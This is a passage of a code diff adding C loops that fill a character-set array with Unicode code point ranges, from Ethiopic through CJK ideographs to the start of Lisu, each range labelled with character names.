+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
